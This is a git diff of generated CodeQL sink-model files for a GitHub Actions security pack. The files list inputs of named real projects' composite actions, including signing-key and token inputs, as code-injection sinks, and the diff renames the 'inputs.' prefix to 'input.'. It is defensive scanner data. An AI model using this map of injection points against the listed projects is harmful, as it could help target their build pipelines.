- - ["apache/camel", "*", "inputs.start-commit", "code-injection", "generated"]
- - ["apache/camel", "*", "inputs.distribution", "code-injection", "generated"]
- - ["apache/camel", "*", "inputs.version", "code-injection", "generated"]
- - ["apache/camel", "*", "inputs.pr-id", "code-injection", "generated"]
- - ["apache/camel", "*", "inputs.mode", "code-injection", "generated"]
\ No newline at end of file
+ - ["apache/camel", "*", "input.end-commit", "code-injection", "generated"]
+ - ["apache/camel", "*", "input.start-commit", "code-injection", "generated"]
+ - ["apache/camel", "*", "input.distribution", "code-injection", "generated"]
+ - ["apache/camel", "*", "input.version", "code-injection", "generated"]
+ - ["apache/camel", "*", "input.pr-id", "code-injection", "generated"]
+ - ["apache/camel", "*", "input.mode", "code-injection", "generated"]
\ No newline at end of file
diff --git a/ql/lib/ext/generated/composite-actions/apache_flink.model.yml b/ql/lib/ext/generated/composite-actions/apache_flink.model.yml
index 99a1e4cec710..dfac696dddf3 100644
--- a/ql/lib/ext/generated/composite-actions/apache_flink.model.yml
+++ b/ql/lib/ext/generated/composite-actions/apache_flink.model.yml
@@ -3,8 +3,8 @@ extensions:
 pack: githubsecuritylab/actions-all
 extensible: sinkModel
 data:
- - ["apache/flink", "*", "inputs.maven-parameters", "code-injection", "generated"]
- - ["apache/flink", "*", "inputs.env", "code-injection", "generated"]
- - ["apache/flink", "*", "inputs.target_directory", "code-injection", "generated"]
- - ["apache/flink", "*", "inputs.source_directory", "code-injection", "generated"]
- - ["apache/flink", "*", "inputs.jdk_version", "code-injection", "generated"]
\ No newline at end of file
+ - ["apache/flink", "*", "input.maven-parameters", "code-injection", "generated"]
+ - ["apache/flink", "*", "input.env", "code-injection", "generated"]
+ - ["apache/flink", "*", "input.target_directory", "code-injection", "generated"]
+ - ["apache/flink", "*", "input.source_directory", "code-injection", "generated"]
+ - ["apache/flink", "*", "input.jdk_version", "code-injection", "generated"]
\ No newline at end of file
diff --git a/ql/lib/ext/generated/composite-actions/apache_nuttx.model.yml b/ql/lib/ext/generated/composite-actions/apache_nuttx.model.yml
index d2a6dbd4929e..5c82922c35e0 100644
--- a/ql/lib/ext/generated/composite-actions/apache_nuttx.model.yml
+++ b/ql/lib/ext/generated/composite-actions/apache_nuttx.model.yml
@@ -3,6 +3,6 @@ extensions:
 pack: githubsecuritylab/actions-all
 extensible: sinkModel
 data:
- - ["apache/nuttx", "*", "inputs.haskell", "code-injection", "generated"]
- - ["apache/nuttx", "*", "inputs.dotnet", "code-injection", "generated"]
- - ["apache/nuttx", "*", "inputs.android", "code-injection", "generated"]
\ No newline at end of file
+ - ["apache/nuttx", "*", "input.haskell", "code-injection", "generated"]
+ - ["apache/nuttx", "*", "input.dotnet", "code-injection", "generated"]
+ - ["apache/nuttx", "*", "input.android", "code-injection", "generated"]
\ No newline at end of file
diff --git a/ql/lib/ext/generated/composite-actions/apache_opendal.model.yml b/ql/lib/ext/generated/composite-actions/apache_opendal.model.yml
index 13a9ff475b92..d618f7b761fe 100644
--- a/ql/lib/ext/generated/composite-actions/apache_opendal.model.yml
+++ b/ql/lib/ext/generated/composite-actions/apache_opendal.model.yml
@@ -3,7 +3,7 @@ extensions:
 pack: githubsecuritylab/actions-all
 extensible: sinkModel
 data:
- - ["apache/opendal", "*", "inputs.feature", "code-injection", "generated"]
- - ["apache/opendal", "*", "inputs.setup", "code-injection", "generated"]
- - ["apache/opendal", "*", "inputs.service", "code-injection", "generated"]
- - ["apache/opendal", "*", "inputs.target", "code-injection", "generated"]
\ No newline at end of file
+ - ["apache/opendal", "*", "input.feature", "code-injection", "generated"]
+ - ["apache/opendal", "*", "input.setup", "code-injection", "generated"]
+ - ["apache/opendal", "*", "input.service", "code-injection", "generated"]
+ - ["apache/opendal", "*", "input.target", "code-injection", "generated"]
\ No newline at end of file
diff --git a/ql/lib/ext/generated/composite-actions/apache_pekko.model.yml b/ql/lib/ext/generated/composite-actions/apache_pekko.model.yml
index a173154bec07..c49315d791a9 100644
--- a/ql/lib/ext/generated/composite-actions/apache_pekko.model.yml
+++ b/ql/lib/ext/generated/composite-actions/apache_pekko.model.yml
@@ -3,4 +3,4 @@ extensions:
 pack: githubsecuritylab/actions-all
 extensible: sinkModel
 data:
- - ["apache/pekko", "*", "inputs.upload", "code-injection", "generated"]
\ No newline at end of file
+ - ["apache/pekko", "*", "input.upload", "code-injection", "generated"]
\ No newline at end of file
diff --git a/ql/lib/ext/generated/composite-actions/apache_pulsar-helm-chart.model.yml b/ql/lib/ext/generated/composite-actions/apache_pulsar-helm-chart.model.yml
index f7a5017d2fb5..f58fcf336fcd 100644
--- a/ql/lib/ext/generated/composite-actions/apache_pulsar-helm-chart.model.yml
+++ b/ql/lib/ext/generated/composite-actions/apache_pulsar-helm-chart.model.yml
@@ -3,10 +3,10 @@ extensions:
 pack: githubsecuritylab/actions-all
 extensible: sinkModel
 data:
- - ["apache/pulsar-helm-chart", "*", "inputs.limit-access-to-users", "code-injection", "generated"]
- - ["apache/pulsar-helm-chart", "*", "inputs.limit-access-to-actor", "code-injection", "generated"]
- - ["apache/pulsar-helm-chart", "*", "inputs.secure-access", "code-injection", "generated"]
- - ["apache/pulsar-helm-chart", "*", "inputs.action", "code-injection", "generated"]
- - ["apache/pulsar-helm-chart", "*", "inputs.yamale_version", "code-injection", "generated"]
- - ["apache/pulsar-helm-chart", "*", "inputs.yamllint_version", "code-injection", "generated"]
- - ["apache/pulsar-helm-chart", "*", "inputs.version", "code-injection", "generated"]
\ No newline at end of file
+ - ["apache/pulsar-helm-chart", "*", "input.limit-access-to-users", "code-injection", "generated"]
+ - ["apache/pulsar-helm-chart", "*", "input.limit-access-to-actor", "code-injection", "generated"]
+ - ["apache/pulsar-helm-chart", "*", "input.secure-access", "code-injection", "generated"]
+ - ["apache/pulsar-helm-chart", "*", "input.action", "code-injection", "generated"]
+ - ["apache/pulsar-helm-chart", "*", "input.yamale_version", "code-injection", "generated"]
+ - ["apache/pulsar-helm-chart", "*", "input.yamllint_version", "code-injection", "generated"]
+ - ["apache/pulsar-helm-chart", "*", "input.version", "code-injection", "generated"]
\ No newline at end of file
diff --git a/ql/lib/ext/generated/composite-actions/apache_superset.model.yml b/ql/lib/ext/generated/composite-actions/apache_superset.model.yml
index 1bcf118810ff..4812eaa5b4a3 100644
--- a/ql/lib/ext/generated/composite-actions/apache_superset.model.yml
+++ b/ql/lib/ext/generated/composite-actions/apache_superset.model.yml
@@ -3,4 +3,4 @@ extensions:
 pack: githubsecuritylab/actions-all
 extensible: sinkModel
 data:
- - ["apache/superset", "*", "inputs.requirements-type", "code-injection", "generated"]
\ No newline at end of file
+ - ["apache/superset", "*", "input.requirements-type", "code-injection", "generated"]
\ No newline at end of file
diff --git a/ql/lib/ext/generated/composite-actions/appflowy-io_appflowy.model.yml b/ql/lib/ext/generated/composite-actions/appflowy-io_appflowy.model.yml
index fb210d5af55c..de8c3e1b7259 100644
--- a/ql/lib/ext/generated/composite-actions/appflowy-io_appflowy.model.yml
+++ b/ql/lib/ext/generated/composite-actions/appflowy-io_appflowy.model.yml
@@ -3,5 +3,5 @@ extensions:
 pack: githubsecuritylab/actions-all
 extensible: sinkModel
 data:
- - ["appflowy-io/appflowy", "*", "inputs.test_path", "code-injection", "generated"]
- - ["appflowy-io/appflowy", "*", "inputs.flutter_profile", "code-injection", "generated"]
\ No newline at end of file
+ - ["appflowy-io/appflowy", "*", "input.test_path", "code-injection", "generated"]
+ - ["appflowy-io/appflowy", "*", "input.flutter_profile", "code-injection", "generated"]
\ No newline at end of file
diff --git a/ql/lib/ext/generated/composite-actions/aptos-labs_aptos-core.model.yml b/ql/lib/ext/generated/composite-actions/aptos-labs_aptos-core.model.yml
index 77554b9872e3..dee268884a14 100644
--- a/ql/lib/ext/generated/composite-actions/aptos-labs_aptos-core.model.yml
+++ b/ql/lib/ext/generated/composite-actions/aptos-labs_aptos-core.model.yml
@@ -3,6 +3,6 @@ extensions:
 pack: githubsecuritylab/actions-all
 extensible: sinkModel
 data:
- - ["aptos-labs/aptos-core", "*", "inputs.GIT_CREDENTIALS", "code-injection", "generated"]
- - ["aptos-labs/aptos-core", "*", "inputs.GCP_DOCKER_ARTIFACT_REPO", "code-injection", "generated"]
- - ["aptos-labs/aptos-core", "*", "inputs.IMAGE_TAG", "code-injection", "generated"]
\ No newline at end of file
+ - ["aptos-labs/aptos-core", "*", "input.GIT_CREDENTIALS", "code-injection", "generated"]
+ - ["aptos-labs/aptos-core", "*", "input.GCP_DOCKER_ARTIFACT_REPO", "code-injection", "generated"]
+ - ["aptos-labs/aptos-core", "*", "input.IMAGE_TAG", "code-injection", "generated"]
\ No newline at end of file
diff --git a/ql/lib/ext/generated/composite-actions/archivesspace_archivesspace.model.yml b/ql/lib/ext/generated/composite-actions/archivesspace_archivesspace.model.yml
index 7fc1eaaca483..5e0e51583902 100644
--- a/ql/lib/ext/generated/composite-actions/archivesspace_archivesspace.model.yml
+++ b/ql/lib/ext/generated/composite-actions/archivesspace_archivesspace.model.yml
@@ -3,4 +3,4 @@ extensions:
 pack: githubsecuritylab/actions-all
 extensible: sinkModel
 data:
- - ["archivesspace/archivesspace", "*", "inputs.mysql-connector-url", "code-injection", "generated"]
\ No newline at end of file
+ - ["archivesspace/archivesspace", "*", "input.mysql-connector-url", "code-injection", "generated"]
\ No newline at end of file
diff --git a/ql/lib/ext/generated/composite-actions/armadaproject_armada.model.yml b/ql/lib/ext/generated/composite-actions/armadaproject_armada.model.yml
index 921095f8a380..bb4b41a05928 100644
--- a/ql/lib/ext/generated/composite-actions/armadaproject_armada.model.yml
+++ b/ql/lib/ext/generated/composite-actions/armadaproject_armada.model.yml
@@ -3,4 +3,4 @@ extensions:
 pack: githubsecuritylab/actions-all
 extensible: sinkModel
 data:
- - ["armadaproject/armada", "*", "inputs.tox-env", "code-injection", "generated"]
\ No newline at end of file
+ - ["armadaproject/armada", "*", "input.tox-env", "code-injection", "generated"]
\ No newline at end of file
diff --git a/ql/lib/ext/generated/composite-actions/armbian_build.model.yml b/ql/lib/ext/generated/composite-actions/armbian_build.model.yml
index e8dba39c742c..ef3a84762dbf 100644
--- a/ql/lib/ext/generated/composite-actions/armbian_build.model.yml
+++ b/ql/lib/ext/generated/composite-actions/armbian_build.model.yml
@@ -3,12 +3,12 @@ extensions:
 pack: githubsecuritylab/actions-all
 extensible: sinkModel
 data:
- - ["armbian/build", "*", "inputs.armbian_pgp_password", "code-injection", "generated"]
- - ["armbian/build", "*", "inputs.armbian_extensions", "code-injection", "generated"]
- - ["armbian/build", "*", "inputs.armbian_release", "code-injection", "generated"]
- - ["armbian/build", "*", "inputs.armbian_kernel_branch", "code-injection", "generated"]
- - ["armbian/build", "*", "inputs.armbian_board", "code-injection", "generated"]
- - ["armbian/build", "*", "inputs.armbian_target", "code-injection", "generated"]
- - ["armbian/build", "*", "inputs.armbian_branch", "code-injection", "generated"]
- - ["armbian/build", "*", "inputs.armbian_ui", "code-injection", "generated"]
- - ["armbian/build", "*", "inputs.armbian_version", "code-injection", "generated"]
\ No newline at end of file
+ - ["armbian/build", "*", "input.armbian_pgp_password", "code-injection", "generated"]
+ - ["armbian/build", "*", "input.armbian_extensions", "code-injection", "generated"]
+ - ["armbian/build", "*", "input.armbian_release", "code-injection", "generated"]
+ - ["armbian/build", "*", "input.armbian_kernel_branch", "code-injection", "generated"]
+ - ["armbian/build", "*", "input.armbian_board", "code-injection", "generated"]
+ - ["armbian/build", "*", "input.armbian_target", "code-injection", "generated"]
+ - ["armbian/build", "*", "input.armbian_branch", "code-injection", "generated"]
+ - ["armbian/build", "*", "input.armbian_ui", "code-injection", "generated"]
+ - ["armbian/build", "*", "input.armbian_version", "code-injection", "generated"]
\ No newline at end of file
diff --git a/ql/lib/ext/generated/composite-actions/auth0_auth0-java.model.yml b/ql/lib/ext/generated/composite-actions/auth0_auth0-java.model.yml
index 69970d3419b2..425242bf220e 100644
--- a/ql/lib/ext/generated/composite-actions/auth0_auth0-java.model.yml
+++ b/ql/lib/ext/generated/composite-actions/auth0_auth0-java.model.yml
@@ -3,7 +3,7 @@ extensions:
 pack: githubsecuritylab/actions-all
 extensible: sinkModel
 data:
- - ["auth0/auth0-java", "*", "inputs.signing-password", "code-injection", "generated"]
- - ["auth0/auth0-java", "*", "inputs.signing-key", "code-injection", "generated"]
- - ["auth0/auth0-java", "*", "inputs.ossr-password", "code-injection", "generated"]
- - ["auth0/auth0-java", "*", "inputs.ossr-username", "code-injection", "generated"]
\ No newline at end of file
+ - ["auth0/auth0-java", "*", "input.signing-password", "code-injection", "generated"]
+ - ["auth0/auth0-java", "*", "input.signing-key", "code-injection", "generated"]
+ - ["auth0/auth0-java", "*", "input.ossr-password", "code-injection", "generated"]
+ - ["auth0/auth0-java", "*", "input.ossr-username", "code-injection", "generated"]
\ No newline at end of file
diff --git a/ql/lib/ext/generated/composite-actions/auth0_auth0.net.model.yml b/ql/lib/ext/generated/composite-actions/auth0_auth0.net.model.yml
index b57797cc643c..62f1ed005edc 100644
--- a/ql/lib/ext/generated/composite-actions/auth0_auth0.net.model.yml
+++ b/ql/lib/ext/generated/composite-actions/auth0_auth0.net.model.yml
@@ -3,6 +3,6 @@ extensions:
 pack: githubsecuritylab/actions-all
 extensible: sinkModel
 data:
- - ["auth0/auth0.net", "*", "inputs.nuget-token", "code-injection", "generated"]
- - ["auth0/auth0.net", "*", "inputs.nuget-directory", "code-injection", "generated"]
- - ["auth0/auth0.net", "*", "inputs.project-paths", "code-injection", "generated"]
\ No newline at end of file
+ - ["auth0/auth0.net", "*", "input.nuget-token", "code-injection", "generated"]
+ - ["auth0/auth0.net", "*", "input.nuget-directory", "code-injection", "generated"]
+ - ["auth0/auth0.net", "*", "input.project-paths", "code-injection", "generated"]
\ No newline at end of file
diff --git a/ql/lib/ext/generated/composite-actions/auth0_auth0.swift.model.yml b/ql/lib/ext/generated/composite-actions/auth0_auth0.swift.model.yml
index 08b65cea6d72..098b460bbd87 100644
--- a/ql/lib/ext/generated/composite-actions/auth0_auth0.swift.model.yml
+++ b/ql/lib/ext/generated/composite-actions/auth0_auth0.swift.model.yml
@@ -3,4 +3,4 @@ extensions:
 pack: githubsecuritylab/actions-all
 extensible: sinkModel
 data:
- - ["auth0/auth0.swift", "*", "inputs.platform", "code-injection", "generated"]
\ No newline at end of file
+ - ["auth0/auth0.swift", "*", "input.platform", "code-injection", "generated"]
\ No newline at end of file
diff --git a/ql/lib/ext/generated/composite-actions/autogluon_autogluon.model.yml b/ql/lib/ext/generated/composite-actions/autogluon_autogluon.model.yml
index 453e60f3595e..d5a257be220a 100644
--- a/ql/lib/ext/generated/composite-actions/autogluon_autogluon.model.yml
+++ b/ql/lib/ext/generated/composite-actions/autogluon_autogluon.model.yml
@@ -3,8 +3,8 @@ extensions:
 pack: githubsecuritylab/actions-all
 extensible: sinkModel
 data:
- - ["autogluon/autogluon", "*", "inputs.submodule-to-test", "code-injection", "generated"]
- - ["autogluon/autogluon", "*", "inputs.command", "code-injection", "generated"]
- - ["autogluon/autogluon", "*", "inputs.work-dir", "code-injection", "generated"]
- - ["autogluon/autogluon", "*", "inputs.job-name", "code-injection", "generated"]
- - ["autogluon/autogluon", "*", "inputs.job-type", "code-injection", "generated"]
\ No newline at end of file
+ - ["autogluon/autogluon", "*", "input.submodule-to-test", "code-injection", "generated"]
+ - ["autogluon/autogluon", "*", "input.command", "code-injection", "generated"]
+ - ["autogluon/autogluon", "*", "input.work-dir", "code-injection", "generated"]
+ - ["autogluon/autogluon", "*", "input.job-name", "code-injection", "generated"]
+ - ["autogluon/autogluon", "*", "input.job-type", "code-injection", "generated"]
\ No newline at end of file
diff --git a/ql/lib/ext/generated/composite-actions/avaiga_taipy.model.yml b/ql/lib/ext/generated/composite-actions/avaiga_taipy.model.yml
index 012802b80063..53c6258551f4 100644
--- a/ql/lib/ext/generated/composite-actions/avaiga_taipy.model.yml
+++ b/ql/lib/ext/generated/composite-actions/avaiga_taipy.model.yml
@@ -3,4 +3,4 @@ extensions:
 pack: githubsecuritylab/actions-all
 extensible: sinkModel
 data:
- - ["avaiga/taipy", "*", "inputs.python-version", "code-injection", "generated"]
\ No newline at end of file
+ - ["avaiga/taipy", "*", "input.python-version", "code-injection", "generated"]
\ No newline at end of file
diff --git a/ql/lib/ext/generated/composite-actions/aws-amplify_amplify-cli.model.yml b/ql/lib/ext/generated/composite-actions/aws-amplify_amplify-cli.model.yml
index a397a77f6dc1..62a4f2bbcd7b 100644
--- a/ql/lib/ext/generated/composite-actions/aws-amplify_amplify-cli.model.yml
+++ b/ql/lib/ext/generated/composite-actions/aws-amplify_amplify-cli.model.yml
@@ -3,4 +3,4 @@ extensions:
 pack: githubsecuritylab/actions-all
 extensible: sinkModel
 data:
- - ["aws-amplify/amplify-cli", "*", "inputs.cli-version", "code-injection", "generated"]
\ No newline at end of file
+ - ["aws-amplify/amplify-cli", "*", "input.cli-version", "code-injection", "generated"]
\ No newline at end of file
diff --git a/ql/lib/ext/generated/composite-actions/aws_amazon-vpc-cni-k8s.model.yml b/ql/lib/ext/generated/composite-actions/aws_amazon-vpc-cni-k8s.model.yml
index 15de610c9812..ac72bb9ebf04 100644
--- a/ql/lib/ext/generated/composite-actions/aws_amazon-vpc-cni-k8s.model.yml
+++ b/ql/lib/ext/generated/composite-actions/aws_amazon-vpc-cni-k8s.model.yml
@@ -3,5 +3,5 @@ extensions:
 pack: githubsecuritylab/actions-all
 extensible: sinkModel
 data:
- - ["aws/amazon-vpc-cni-k8s", "*", "inputs.go-package", "code-injection", "generated"]
- - ["aws/amazon-vpc-cni-k8s", "*", "inputs.work-dir", "code-injection", "generated"]
\ No newline at end of file
+ - ["aws/amazon-vpc-cni-k8s", "*", "input.go-package", "code-injection", "generated"]
+ - ["aws/amazon-vpc-cni-k8s", "*", "input.work-dir", "code-injection", "generated"]
\ No newline at end of file
diff --git a/ql/lib/ext/generated/composite-actions/aws_karpenter-provider-aws.model.yml b/ql/lib/ext/generated/composite-actions/aws_karpenter-provider-aws.model.yml
index ad6e7e806cd0..b3f1ca67eef7 100644
--- a/ql/lib/ext/generated/composite-actions/aws_karpenter-provider-aws.model.yml
+++ b/ql/lib/ext/generated/composite-actions/aws_karpenter-provider-aws.model.yml
@@ -3,5 +3,5 @@ extensions:
 pack: githubsecuritylab/actions-all
 extensible: sinkModel
 data:
- - ["aws/karpenter-provider-aws", "*", "inputs.account_id", "code-injection", "generated"]
- - ["aws/karpenter-provider-aws", "*", "inputs.cluster_name", "code-injection", "generated"]
\ No newline at end of file
+ - ["aws/karpenter-provider-aws", "*", "input.account_id", "code-injection", "generated"]
+ - ["aws/karpenter-provider-aws", "*", "input.cluster_name", "code-injection", "generated"]
\ No newline at end of file
diff --git a/ql/lib/ext/generated/composite-actions/awslabs_amazon-eks-ami.model.yml b/ql/lib/ext/generated/composite-actions/awslabs_amazon-eks-ami.model.yml
index 67631102d71f..44f5ad660960 100644
--- a/ql/lib/ext/generated/composite-actions/awslabs_amazon-eks-ami.model.yml
+++ b/ql/lib/ext/generated/composite-actions/awslabs_amazon-eks-ami.model.yml
@@ -3,10 +3,10 @@ extensions:
 pack: githubsecuritylab/actions-all
 extensible: sinkModel
 data:
- - ["awslabs/amazon-eks-ami", "*", "inputs.max_resource_age_duration", "code-injection", "generated"]
- - ["awslabs/amazon-eks-ami", "*", "inputs.aws_region", "code-injection", "generated"]
- - ["awslabs/amazon-eks-ami", "*", "inputs.ami_id", "code-injection", "generated"]
- - ["awslabs/amazon-eks-ami", "*", "inputs.k8s_version", "code-injection", "generated"]
- - ["awslabs/amazon-eks-ami", "*", "inputs.os_distro", "code-injection", "generated"]
- - ["awslabs/amazon-eks-ami", "*", "inputs.additional_arguments", "code-injection", "generated"]
- - ["awslabs/amazon-eks-ami", "*", "inputs.build_id", "code-injection", "generated"]
\ No newline at end of file
+ - ["awslabs/amazon-eks-ami", "*", "input.max_resource_age_duration", "code-injection", "generated"]
+ - ["awslabs/amazon-eks-ami", "*", "input.aws_region", "code-injection", "generated"]
+ - ["awslabs/amazon-eks-ami", "*", "input.ami_id", "code-injection", "generated"]
+ - ["awslabs/amazon-eks-ami", "*", "input.k8s_version", "code-injection", "generated"]
+ - ["awslabs/amazon-eks-ami", "*", "input.os_distro", "code-injection", "generated"]
+ - ["awslabs/amazon-eks-ami", "*", "input.additional_arguments", "code-injection", "generated"]
+ - ["awslabs/amazon-eks-ami", "*", "input.build_id", "code-injection", "generated"]
\ No newline at end of file
diff --git a/ql/lib/ext/generated/composite-actions/awslabs_aws-lambda-rust-runtime.model.yml b/ql/lib/ext/generated/composite-actions/awslabs_aws-lambda-rust-runtime.model.yml
index 098d7c139fa5..c2e56f7e175c 100644
--- a/ql/lib/ext/generated/composite-actions/awslabs_aws-lambda-rust-runtime.model.yml
+++ b/ql/lib/ext/generated/composite-actions/awslabs_aws-lambda-rust-runtime.model.yml
@@ -3,4 +3,4 @@ extensions:
 pack: githubsecuritylab/actions-all
 extensible: sinkModel
 data:
- - ["awslabs/aws-lambda-rust-runtime", "*", "inputs.package", "code-injection", "generated"]
\ No newline at end of file
+ - ["awslabs/aws-lambda-rust-runtime", "*", "input.package", "code-injection", "generated"]
\ No newline at end of file
diff --git a/ql/lib/ext/generated/composite-actions/azerothcore_azerothcore-wotlk.model.yml b/ql/lib/ext/generated/composite-actions/azerothcore_azerothcore-wotlk.model.yml
index def12e487410..54d0c8b2fe09 100644
--- a/ql/lib/ext/generated/composite-actions/azerothcore_azerothcore-wotlk.model.yml
+++ b/ql/lib/ext/generated/composite-actions/azerothcore_azerothcore-wotlk.model.yml
@@ -3,5 +3,5 @@ extensions:
 pack: githubsecuritylab/actions-all
 extensible: sinkModel
 data:
- - ["azerothcore/azerothcore-wotlk", "*", "inputs.CXX", "code-injection", "generated"]
- - ["azerothcore/azerothcore-wotlk", "*", "inputs.CC", "code-injection", "generated"]
\ No newline at end of file
+ - ["azerothcore/azerothcore-wotlk", "*", "input.CXX", "code-injection", "generated"]
+ - ["azerothcore/azerothcore-wotlk", "*", "input.CC", "code-injection", "generated"]
\ No newline at end of file
diff --git a/ql/lib/ext/generated/composite-actions/azure_azure-datafactory.model.yml b/ql/lib/ext/generated/composite-actions/azure_azure-datafactory.model.yml
index 768db7317cc3..b1914e7a96b5 100644
--- a/ql/lib/ext/generated/composite-actions/azure_azure-datafactory.model.yml
+++ b/ql/lib/ext/generated/composite-actions/azure_azure-datafactory.model.yml
@@ -3,5 +3,5 @@ extensions:
 pack: githubsecuritylab/actions-all
 extensible: sinkModel
 data:
- - ["azure/azure-datafactory", "*", "inputs.directory", "code-injection", "generated"]
- - ["azure/azure-datafactory", "*", "inputs.path", "code-injection", "generated"]
\ No newline at end of file
+ - ["azure/azure-datafactory", "*", "input.directory", "code-injection", "generated"]
+ - ["azure/azure-datafactory", "*", "input.path", "code-injection", "generated"]
\ No newline at end of file
diff --git a/ql/lib/ext/generated/composite-actions/badges_shields.model.yml b/ql/lib/ext/generated/composite-actions/badges_shields.model.yml
index 55218009c022..dd66f206ee99 100644
--- a/ql/lib/ext/generated/composite-actions/badges_shields.model.yml
+++ b/ql/lib/ext/generated/composite-actions/badges_shields.model.yml
@@ -3,4 +3,4 @@ extensions:
 pack: githubsecuritylab/actions-all
 extensible: sinkModel
 data:
- - ["badges/shields", "*", "inputs.npm-version", "code-injection", "generated"]
\ No newline at end of file
+ - ["badges/shields", "*", "input.npm-version", "code-injection", "generated"]
\ No newline at end of file
diff --git a/ql/lib/ext/generated/composite-actions/balena-io_etcher.model.yml b/ql/lib/ext/generated/composite-actions/balena-io_etcher.model.yml
index 17ec5471e85c..0c26f02e6d86 100644
--- a/ql/lib/ext/generated/composite-actions/balena-io_etcher.model.yml
+++ b/ql/lib/ext/generated/composite-actions/balena-io_etcher.model.yml
@@ -3,4 +3,4 @@ extensions:
 pack: githubsecuritylab/actions-all
 extensible: sinkModel
 data:
- - ["balena-io/etcher", "*", "inputs.VERBOSE", "code-injection", "generated"]
\ No newline at end of file
+ - ["balena-io/etcher", "*", "input.VERBOSE", "code-injection", "generated"]
\ No newline at end of file
diff --git a/ql/lib/ext/generated/composite-actions/balena-os_balena-engine.model.yml b/ql/lib/ext/generated/composite-actions/balena-os_balena-engine.model.yml
index 55cd8b18241d..2ee13115d6d9 100644
--- a/ql/lib/ext/generated/composite-actions/balena-os_balena-engine.model.yml
+++ b/ql/lib/ext/generated/composite-actions/balena-os_balena-engine.model.yml
@@ -3,4 +3,4 @@ extensions:
 pack: githubsecuritylab/actions-all
 extensible: sinkModel
 data:
- - ["balena-os/balena-engine", "*", "inputs.VERBOSE", "code-injection", "generated"]
\ No newline at end of file
+ - ["balena-os/balena-engine", "*", "input.VERBOSE", "code-injection", "generated"]
\ No newline at end of file
diff --git a/ql/lib/ext/generated/composite-actions/ben-manes_caffeine.model.yml b/ql/lib/ext/generated/composite-actions/ben-manes_caffeine.model.yml
index 328d58d9e42b..c76ed5b66045 100644
--- a/ql/lib/ext/generated/composite-actions/ben-manes_caffeine.model.yml
+++ b/ql/lib/ext/generated/composite-actions/ben-manes_caffeine.model.yml
@@ -3,8 +3,8 @@ extensions:
 pack: githubsecuritylab/actions-all
 extensible: sinkModel
 data:
- - ["ben-manes/caffeine", "*", "inputs.attempt-delay", "code-injection", "generated"]
- - ["ben-manes/caffeine", "*", "inputs.attempt-limit", "code-injection", "generated"]
- - ["ben-manes/caffeine", "*", "inputs.arguments", "code-injection", "generated"]
- - ["ben-manes/caffeine", "*", "inputs.graal", "code-injection", "generated"]
- - ["ben-manes/caffeine", "*", "inputs.java", "code-injection", "generated"]
\ No newline at end of file
+ - ["ben-manes/caffeine", "*", "input.attempt-delay", "code-injection", "generated"]
+ - ["ben-manes/caffeine", "*", "input.attempt-limit", "code-injection", "generated"]
+ - ["ben-manes/caffeine", "*", "input.arguments", "code-injection", "generated"]
+ - ["ben-manes/caffeine", "*", "input.graal", "code-injection", "generated"]
+ - ["ben-manes/caffeine", "*", "input.java", "code-injection", "generated"]
\ No newline at end of file
diff --git a/ql/lib/ext/generated/composite-actions/bokeh_bokeh.model.yml b/ql/lib/ext/generated/composite-actions/bokeh_bokeh.model.yml
index 836bda1041ad..0bdf2087b46a 100644
--- a/ql/lib/ext/generated/composite-actions/bokeh_bokeh.model.yml
+++ b/ql/lib/ext/generated/composite-actions/bokeh_bokeh.model.yml
@@ -3,4 +3,4 @@ extensions:
 pack: githubsecuritylab/actions-all
 extensible: sinkModel
 data:
- - ["bokeh/bokeh", "*", "inputs.test-env", "code-injection", "generated"]
\ No newline at end of file
+ - ["bokeh/bokeh", "*", "input.test-env", "code-injection", "generated"]
\ No newline at end of file
diff --git a/ql/lib/ext/generated/composite-actions/botpress_botpress.model.yml b/ql/lib/ext/generated/composite-actions/botpress_botpress.model.yml
index b6f9ee027f1f..bb83a5964e7c 100644
--- a/ql/lib/ext/generated/composite-actions/botpress_botpress.model.yml
+++ b/ql/lib/ext/generated/composite-actions/botpress_botpress.model.yml
@@ -3,4 +3,4 @@ extensions:
 pack: githubsecuritylab/actions-all
 extensible: sinkModel
 data:
- - ["botpress/botpress", "*", "inputs.tilt_cmd", "code-injection", "generated"]
\ No newline at end of file
+ - ["botpress/botpress", "*", "input.tilt_cmd", "code-injection", "generated"]
\ No newline at end of file
diff --git a/ql/lib/ext/generated/composite-actions/braintree_braintree-android-drop-in.model.yml b/ql/lib/ext/generated/composite-actions/braintree_braintree-android-drop-in.model.yml
index 2f6458219b62..f29c52b1bf5b 100644
--- a/ql/lib/ext/generated/composite-actions/braintree_braintree-android-drop-in.model.yml
+++ b/ql/lib/ext/generated/composite-actions/braintree_braintree-android-drop-in.model.yml
@@ -3,6 +3,6 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["braintree/braintree-android-drop-in", "*", "inputs.version", "code-injection", "generated"] - - ["braintree/braintree-android-drop-in", "*", "inputs.signing_file_path", "code-injection", "generated"] - - ["braintree/braintree-android-drop-in", "*", "inputs.signing_key_file", "code-injection", "generated"] \ No newline at end of file + - ["braintree/braintree-android-drop-in", "*", "input.version", "code-injection", "generated"] + - ["braintree/braintree-android-drop-in", "*", "input.signing_file_path", "code-injection", "generated"] + - ["braintree/braintree-android-drop-in", "*", "input.signing_key_file", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/braintree_braintree_android.model.yml b/ql/lib/ext/generated/composite-actions/braintree_braintree_android.model.yml index 374a13ccd82d..43745006f8db 100644 --- a/ql/lib/ext/generated/composite-actions/braintree_braintree_android.model.yml +++ b/ql/lib/ext/generated/composite-actions/braintree_braintree_android.model.yml 
@@ -3,7 +3,7 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["braintree/braintree/android", "*", "inputs.version", "code-injection", "generated"] - - ["braintree/braintree/android", "*", "inputs.module", "code-injection", "generated"] - - ["braintree/braintree/android", "*", "inputs.signing_file_path", "code-injection", "generated"] - - ["braintree/braintree/android", "*", "inputs.signing_key_file", "code-injection", "generated"] \ No newline at end of file + - ["braintree/braintree/android", "*", "input.version", "code-injection", "generated"] + - ["braintree/braintree/android", "*", "input.module", "code-injection", "generated"] + - ["braintree/braintree/android", "*", "input.signing_file_path", "code-injection", "generated"] + - ["braintree/braintree/android", "*", "input.signing_key_file", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/broadinstitute_gatk.model.yml b/ql/lib/ext/generated/composite-actions/broadinstitute_gatk.model.yml index fb4608ec70be..9289afb744f9 100644 --- a/ql/lib/ext/generated/composite-actions/broadinstitute_gatk.model.yml +++ b/ql/lib/ext/generated/composite-actions/broadinstitute_gatk.model.yml @@ -3,6 +3,6 @@ extensions: pack: 